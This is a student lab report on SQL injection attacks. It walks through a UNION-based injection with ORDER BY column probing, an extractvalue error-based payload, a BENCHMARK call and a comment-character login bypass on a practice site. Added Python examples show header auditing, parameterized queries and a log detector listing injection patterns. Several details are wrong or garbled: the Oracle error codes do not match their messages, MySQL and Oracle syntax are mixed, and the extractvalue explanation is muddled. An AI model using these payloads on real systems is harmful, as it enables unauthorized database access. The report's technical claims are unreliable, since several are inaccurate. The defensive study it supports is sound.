Lab report 5 (docx, 9 pages). School: Technical University of Mombasa. Course: ACH101, Information Systems. Date: Nov 24, 2024.
SQL INJECTION ATTACKS
Student’s Name
Institutional Affiliation
Course
Instructor’s Name
Date
1.
Why did you use Curl and Wappalyzer™ in this lab? What else can you use for the same purpose?
Curl and Wappalyzer are used to send an HTTP GET request to the website (Singh and Sharma, 2020). The response lets one identify the web server software and version, and the operating system it is running on. This web server fingerprinting is a crucial reconnaissance step, which in hacking is the first step. Apart from Curl and Wappalyzer, Wget and BuiltWith can be used as alternatives.
Wget is a free software package for retrieving files using HTTP, HTTPS and FTP, the most widely used Internet protocols. It is a non-interactive command-line tool, so it can be run from cron jobs, scripts, terminals lacking X-Windows support, and many other places. BuiltWith shows the technologies behind web pages and web apps, and it does this in a concise, categorized format (Yeung, 2018).
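The kind of information curl -I returns is easiest to see on one's own site. As an added example that is not part of this lab report, the Python snippet below parses a constructed curl -I style response (the header values are made up, not captured from any real server) and flags the headers and cookie names that disclose the server software and version, which is the check an administrator runs before and after turning such disclosure off.

```python
import re

# Constructed curl -I style output: made up for this example, not captured
# from any real site.
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:00:00 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/7.4.3
Set-Cookie: PHPSESSID=constructedvalue; path=/
Content-Type: text/html; charset=UTF-8
"""

# The same response after version disclosure has been switched off
# (constructed as well).
HARDENED_HEADERS = """HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:00:00 GMT
Server: Apache
Set-Cookie: sid=constructedvalue; path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
"""

# Headers that commonly carry software names and versions.
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")
VERSION_RE = re.compile(r"\d+\.\d+")
# Default session cookie names that identify the application platform.
PLATFORM_COOKIE_RE = re.compile(r"\b(PHPSESSID|JSESSIONID|ASP\.NET_SessionId)=")

def parse_headers(raw):
    """Split a raw header block into (status_line, {lowercased name: value})."""
    lines = [ln for ln in raw.splitlines() if ln.strip()]
    status_line, headers = lines[0], {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        # Repeated headers (for example several Set-Cookie lines) are joined.
        headers[name] = value if name not in headers else headers[name] + ", " + value
    return status_line, headers

def disclosure_findings(headers):
    """Return (header, value, severity) tuples for headers that reveal software.

    'version' means a version number is exposed; 'product' means only the
    product name is exposed."""
    findings = []
    for name in DISCLOSING_HEADERS:
        if name in headers:
            severity = "version" if VERSION_RE.search(headers[name]) else "product"
            findings.append((name, headers[name], severity))
    m = PLATFORM_COOKIE_RE.search(headers.get("set-cookie", ""))
    if m:
        findings.append(("set-cookie", m.group(1), "product"))
    return findings

def audit(raw):
    """Parse a raw response header block and return its disclosure findings."""
    _, headers = parse_headers(raw)
    return disclosure_findings(headers)

if __name__ == "__main__":
    for label, raw in (("default", SAMPLE_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label)
        for name, value, severity in audit(raw):
            print(f"  {name}: {value}  [{severity}]")
```

Feeding the script real output is a matter of piping `curl -sI https://your-own-host/` into `audit()`; the hardened sample still names the product, which is usually acceptable, while the default sample gives away two exact versions.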
2.
Provide an example of a UNION-based SQL injection attack.
SQL injection attacks occur when an attacker injects malicious SQL statements through a vulnerable input parameter and uses the backend database to retrieve information. In UNION-based attacks, the attacker appends a UNION SELECT statement to the original query to retrieve data from other tables; this is the most popular form of the attack. The following is an example of the attack. One first issues a query, observes the result, and from that determines how to proceed.
Query One:
SELECT name, characterization, cost FROM services WHERE category=1 UNION SELECT 1 FROM information_schema.tables
RETURNED ERROR:
ORA-00854: view does not exist.
Since that view does not exist, the next step is to guess a view name commonly used by the DBMS for trial two.
SELECT name, characterization, cost FROM services WHERE category=1 UNION SELECT 1 FROM all_views
RETURNED ERROR:
ORA-01889: query block has incorrect number of result columns.
This view exists, so it is not what triggered the error; to solve this, the correct number of columns must be guessed.
Thus, in the next step, the number of columns is probed with ORDER BY.
SELECT name, characterization, cost FROM services WHERE category=1 ORDER BY 2
OUTCOME: the returned data is sorted by characterization.
At this point the query is known to have at least two columns, and the probe continues to identify the exact number.
SELECT name, characterization, cost FROM services WHERE category=1 ORDER BY 4
RETURNED ERROR:
ORA-01945: ORDER BY item must be the number of a SELECT-list expression.
From this, the total number of columns is concluded to be three.
With the exact number of columns known, the real query is finally made:
SELECT name, characterization, cost FROM services WHERE category=1 UNION SELECT 'A', 'B', 3 FROM all_views
OUTCOME: data is listed and no error message is returned.
3.
Research the Internet and discuss the best way an organization can prevent SQL injection
attacks. Describe how it works and why it is the best way.
To prevent these injection attacks, the organization should use parameterized (bound) database queries, in which user input is passed to the database as a bound value and is never parsed as part of the SQL text. Typed parameters should also be used, and stored procedures, which are likewise parameterized, should be employed carefully.
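The difference between the vulnerable query in question 2 and the parameterized query recommended here is easiest to see side by side. The following Python script is an added example, not code from the lab or from any application it describes: it builds a constructed in-memory SQLite database with a services table that borrows the lab's column names (name, characterization, cost, category; the table layout and rows are assumptions), then runs the same UNION payload through a string-concatenated query, a bound-parameter query, and a typed-parameter query.

```python
import sqlite3

def make_db():
    """Build a constructed in-memory database: a services table shaped like
    the lab's UNION example (assumed column names) and a second table whose
    rows a UNION payload could pull into the result."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE services (name TEXT, characterization TEXT, cost INTEGER, category INTEGER);
        INSERT INTO services VALUES ('Audit', 'Annual security audit', 500, 1);
        INSERT INTO services VALUES ('Pentest', 'Web application test', 900, 2);
        CREATE TABLE staff (username TEXT, passcode TEXT);
        INSERT INTO staff VALUES ('alice', 'constructed-hash-value');
    """)
    return conn

def lookup_vulnerable(conn, category):
    # Vulnerable: the caller's string is spliced into the SQL text, so a
    # UNION SELECT appended to it is parsed as part of the query.
    sql = "SELECT name, characterization, cost FROM services WHERE category=" + category
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, category):
    # Hardened: the value is bound to a placeholder and handed to the engine
    # separately from the SQL text, so it is only ever compared as data.
    sql = "SELECT name, characterization, cost FROM services WHERE category=?"
    return conn.execute(sql, (category,)).fetchall()

def lookup_typed(conn, category):
    # Hardened further with a typed parameter: anything that is not an
    # integer is rejected (ValueError) before it reaches the database.
    return lookup_parameterized(conn, int(category))

if __name__ == "__main__":
    conn = make_db()
    payload = "1 UNION SELECT username, passcode, 3 FROM staff"
    print("vulnerable:   ", lookup_vulnerable(conn, payload))
    print("parameterized:", lookup_parameterized(conn, payload))
    try:
        lookup_typed(conn, payload)
    except ValueError as exc:
        print("typed:         rejected:", exc)
```

With the payload, the concatenated query returns the staff row alongside the service rows, the bound query returns nothing because the whole string is compared against the category column as one value, and the typed version never issues a query at all. The `?` placeholder is SQLite's style; other drivers use `%s` or `:name`, but the mechanism is the same.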
4.
Describe the ExtractValue function syntax used in the following command:
' or extractvalue(0x3a, concat(0x3a, (select database()))) #
In the above command, the function EXTRACTVALUE takes two arguments, an XML fragment and an XPath expression, and returns the matched node as a scalar value. The result of this command must be a single node: a text node, an attribute, or an element.
6.
What other function can you use besides the select database function to obtain system
information?
BENCHMARK(count, expr) is one option. For example:
BENCHMARK(80, (SELECT * FROM test4))
2 rows in set (0.00 sec)
In the above example, the test4 table is assumed to have only two columns and two rows. The returned value is always 0; the time reported is the elapsed time measured at the client end, never the CPU time at the server end.
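Questions 2, 4 and 6 each name a construct that is rarely seen in legitimate traffic: a UNION SELECT appended to a parameter, extractvalue() or updatexml() wrapped around a subquery, BENCHMARK() or SLEEP(), an ORDER BY probe, and a comment character used to cut off the rest of the query. A defender can turn exactly those constructs into a log check. The Python script below is an added example, not part of the lab: it runs over constructed access-log lines (addresses, timestamps and requests are made up for the example) and reports which of these patterns each URL-decoded request matches.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in common log format; the IPs, times and
# requests are made up for this example.
LOG_LINES = [
    '10.0.0.5 - - [24/Nov/2024:10:00:01 +0000] "GET /services?category=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Nov/2024:10:00:07 +0000] "GET /services?category=1%20UNION%20SELECT%20%27A%27,%27B%27,3%20FROM%20all_views HTTP/1.1" 200 2048',
    '10.0.0.9 - - [24/Nov/2024:10:00:12 +0000] "GET /login?user=%27%20or%20extractvalue(0x3a,concat(0x3a,(select%20database())))%23 HTTP/1.1" 500 131',
    '10.0.0.9 - - [24/Nov/2024:10:00:20 +0000] "GET /services?category=1%20ORDER%20BY%204 HTTP/1.1" 500 131',
    '10.0.0.9 - - [24/Nov/2024:10:00:26 +0000] "GET /services?category=1%20AND%20BENCHMARK(80,(SELECT%20*%20FROM%20test4)) HTTP/1.1" 200 512',
    '10.0.0.5 - - [24/Nov/2024:10:00:31 +0000] "POST /login HTTP/1.1" 302 0',
]

# Each pattern is one technique named in the lab; matching runs on the
# URL-decoded request target so %20/%27/%23 encoding does not hide it.
PATTERNS = {
    "union_select": re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b", re.I),
    "xml_error_function": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
    "timing_function": re.compile(r"\b(?:benchmark|sleep)\s*\(", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b", re.I),
    "comment_terminator": re.compile(r"#|--\s|/\*"),
}
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
CLIENT_RE = re.compile(r"^(?P<ip>\S+) ")

def decode_target(line):
    """Return the URL-decoded request target of a log line, or None."""
    m = REQUEST_RE.search(line)
    return unquote_plus(m.group("target")) if m else None

def classify(target):
    """Return the sorted list of pattern names that match a decoded target."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(target))

def scan_log(lines):
    """Return one record per suspicious line: client IP, decoded target, reasons."""
    hits = []
    for line in lines:
        target = decode_target(line)
        if target is None:
            continue
        reasons = classify(target)
        if reasons:
            ip = CLIENT_RE.match(line).group("ip")
            hits.append({"ip": ip, "target": target, "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit["ip"], hit["reasons"], hit["target"])
```

Only the query string is inspected here; POST bodies are not in a standard access log, so the same classifier would have to be fed from the application or a web application firewall for form logins such as the one in question 7. The `#` rule is deliberately broad: a fragment never reaches the server in a normal request, so a literal `#` in a logged target is worth a look on its own.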
7.
In the urbank.com login page, execute an SQL injection attack from the username box to display the current user. Research your answer and provide a screenshot of your results.
Into the username field, enter a single quote and press Enter.
RETURNED ERROR: TELLS US THAT THE ENTERED SINGLE QUOTE WAS NOT FILTERED.
The result is a broken query:
SELECT * FROM $tbl_name WHERE username=''' and passcode=''
The next step is to input a comment character so that the broken query is fixed, and the Enter button is pressed.
The result returns the fixed query:
SELECT * FROM $tbl_name WHERE username='#' and passcode=''
This is important because, in the original query, the username/passcode combination must match the values stored in the database. The `and passcode=''` part is, however, excluded by the comment character.
To test the above, Alice'# is entered and the Enter key is pressed.
Bypass and login were a success.
Query results:
SELECT * FROM $tbl_name WHERE username='Alice' #' and passcode=''
References
AlternativeTo (n.d.). Alternatives to cURL for all platforms with any license. Retrieved from https://alternativeto.net/software/built-with/
Patni, S. (2017). Pro RESTful APIs. Apress.
Singh, H., & Sharma, H. (2020). Hands-On Web Penetration Testing with Metasploit: The subtle art of using Metasploit 5.0 for web application exploitation. Packt Publishing Ltd.
Strika, L. (2018, Oct 7). How to start using Curl and why: a hands-on introduction. Retrieved from https://www.freecodecamp.org/news/how-to-start-using-curl-and-why-a-hands-on-introduction-
Yeung, A. (2018). Hands-On Server-Side Web Development with Swift: Build dynamic web apps by leveraging two popular Swift web frameworks: Vapor 3.0 and Kitura 2.5. Packt Publishing Ltd.